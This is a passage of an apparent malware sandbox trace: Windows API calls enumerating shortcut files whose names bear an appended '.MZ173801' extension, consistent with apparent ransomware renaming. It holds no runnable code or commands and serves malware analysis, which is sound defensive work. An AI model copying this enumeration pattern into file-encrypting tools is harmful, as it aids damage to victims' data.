ftLastWriteTime.dwLowDateTime=0xa2877843, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3f4, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="ImYAKHvtRzfAlzW.flv.lnk.MZ173801", cAlternateFileName="IMYAKH~1.MZ1")) returned 1 [0113.410] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.410] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.410] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cbf859b, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x9cbf859b, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa2877843, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x45a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="IZVvQMMfV6LuTAy.lnk.MZ173801", cAlternateFileName="IZVVQM~1.MZ1")) returned 1 [0113.410] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.411] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.411] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea801a37, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea801a37, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa2897302, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3a6, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="I_TP.lnk.MZ173801", cAlternateFileName="I_TPLN~1.MZ1")) returned 1 [0113.411] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.411] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.411] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9fa9379, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe9fa9379, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa2897302, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x28d, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="JA9a6Ju2ZS4.lnk.MZ173801", cAlternateFileName="JA9A6J~1.MZ1")) returned 1 [0113.411] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.411] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.411] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9718987e, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x9718987e, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa28bdafe, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x408, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="JHYEYVRjOm0-o3XP-xL.lnk.MZ173801", cAlternateFileName="JHYEYV~1.MZ1")) returned 1 [0113.411] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.411] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.411] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e48b6a5, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7e48b6a5, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa28bdafe, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="JRD90ylj1Dg_Ngx4FKM.flv.lnk.MZ173801", cAlternateFileName="JRD90Y~1.MZ1")) returned 1 [0113.411] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.411] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.411] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7644b3fd, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7644b3fd, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa28bdafe, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x441, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="jt9dNiGSkN.lnk.MZ173801", cAlternateFileName="JT9DNI~1.MZ1")) returned 1 [0113.411] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.411] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.411] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea78f1bf, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea78f1bf, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa292fb3f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3b0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="K4Pe6YIq.lnk.MZ173801", cAlternateFileName="K4PE6Y~1.MZ1")) returned 1 [0113.411] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.411] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.411] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91e2f5a0, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x91e2f5a0, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa29a6b34, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="KL4cEqDQZvlWYISl9.lnk.MZ173801", cAlternateFileName="KL4CEQ~1.MZ1")) returned 1 [0113.411] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.411] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.411] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84154a54, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x84154a54, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa29a6b34, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x54e, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="ky0-S969NuCh.lnk.MZ173801", cAlternateFileName="KY0-S9~1.MZ1")) returned 1 [0113.411] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.411] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.411] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x739e4c75, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x739e4c75, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa29c837a, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4c4, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="MkfvC5YVoY.lnk.MZ173801", cAlternateFileName="MKFVC5~1.MZ1")) returned 1 [0113.411] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.411] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.411] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea97eea1, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea97eea1, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa29c837a, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x5fa, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="mmI1-6XkHu4NPFT8JK.lnk.MZ173801", cAlternateFileName="MMI1-6~1.MZ1")) returned 1 [0113.411] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.411] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.411] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d1d5653, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x6d1d5653, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa2a60e3e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="MRdmd02KMM5JtOIVQ.lnk.MZ173801", cAlternateFileName="MRDMD0~1.MZ1")) returned 1 [0113.411] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.411] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.411] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70aaa9be, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75a70d20, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa2a8707a, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2de, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Music.lnk.MZ173801", cAlternateFileName="MUSICL~1.MZ1")) returned 1 [0113.411] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.412] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.412] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7612940b, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7612940b, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa2a8707a, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4bf, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="N68wVE30d.lnk.MZ173801", cAlternateFileName="N68WVE~1.MZ1")) returned 1 [0113.412] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.412] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.412] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea126b1b, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea126b1b, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa2aad3c8, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3d7, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="nPzlQpS1Oj776IOfWV7.lnk.MZ173801", cAlternateFileName="NPZLQP~1.MZ1")) returned 1 [0113.412] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.412] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.412] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea447fa8, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x9aa24e19, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa2aad3c8, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x41a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="NVV_UxLtcOyTWBX.lnk.MZ173801", cAlternateFileName="NVV_UX~1.MZ1")) returned 1 [0113.412] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.412] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.412] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeadb10bc, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeadb10bc, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa2e66e8c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x539, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="nZr6PHEvCUKrD5BUDBLc.lnk.MZ173801", cAlternateFileName="NZR6PH~1.MZ1")) returned 1 [0113.412] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.412] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.412] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d482b73, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7d482b73, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa2e8dd99, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x62a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="o0b7l4H.lnk.MZ173801", cAlternateFileName="O0B7L4~1.MZ1")) returned 1 [0113.412] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.412] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.412] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa37f6515, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0xa37f6515, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa381c65b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x5e1, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="o87Ff8jxDauutKhIzSH.lnk", cAlternateFileName="O87FF8~1.LNK")) returned 1 [0113.412] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.412] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.412] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ac4d72d, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7ac4d72d, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa2e8dd99, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3dd, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="oA91dS68Kck7s8GQB.lnk.MZ173801", cAlternateFileName="OA91DS~1.MZ1")) returned 1 [0113.412] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.412] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.412] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea8c05d6, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea8c05d6, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa30d0015, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x47d, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="OBs8J_Fu4-ilYu.flv.lnk.MZ173801", cAlternateFileName="OBS8J_~1.MZ1")) returned 1 [0113.412] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.412] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.412] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75f1be16, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75f1be16, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa30d0015, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3e5, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="ONXmEb1WE6Xl.lnk.MZ173801", cAlternateFileName="ONXMEB~1.MZ1")) returned 1 [0113.412] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.412] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.412] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb1fd710, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb1fd710, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa30f5609, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x29c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="o_sfpnC-AoY-JO.lnk.MZ173801", cAlternateFileName="O_SFPN~1.MZ1")) returned 1 [0113.412] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.412] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.412] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fc64407, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x9fc64407, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa30f5609, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x464, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="p6BEEl6x9.lnk.MZ173801", cAlternateFileName="P6BEEL~1.MZ1")) returned 1 [0113.412] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.412] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.412] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72d7838d, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x72d7838d, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa311b7de, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4bf, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="peBrvrQ9V.ots.lnk.MZ173801", cAlternateFileName="PEBRVR~1.MZ1")) returned 1 [0113.412] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.413] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.413] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea7b52c7, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x90d789cb, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa311b7de, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2f1, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Pictures.lnk.MZ173801", cAlternateFileName="PICTUR~1.MZ1")) returned 1 [0113.413] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.413] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.413] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x760ed6ef, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x763aefec, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa33f03c3, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x434, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="PlN2.lnk.MZ173801", cAlternateFileName="PLN2LN~1.MZ1")) returned 1 [0113.413] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.413] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.413] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7575b8a4, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7575b8a4, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa33f03c3, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x399, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="PuYC77t.lnk.MZ173801", cAlternateFileName="PUYC77~1.MZ1")) returned 1 [0113.413] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, 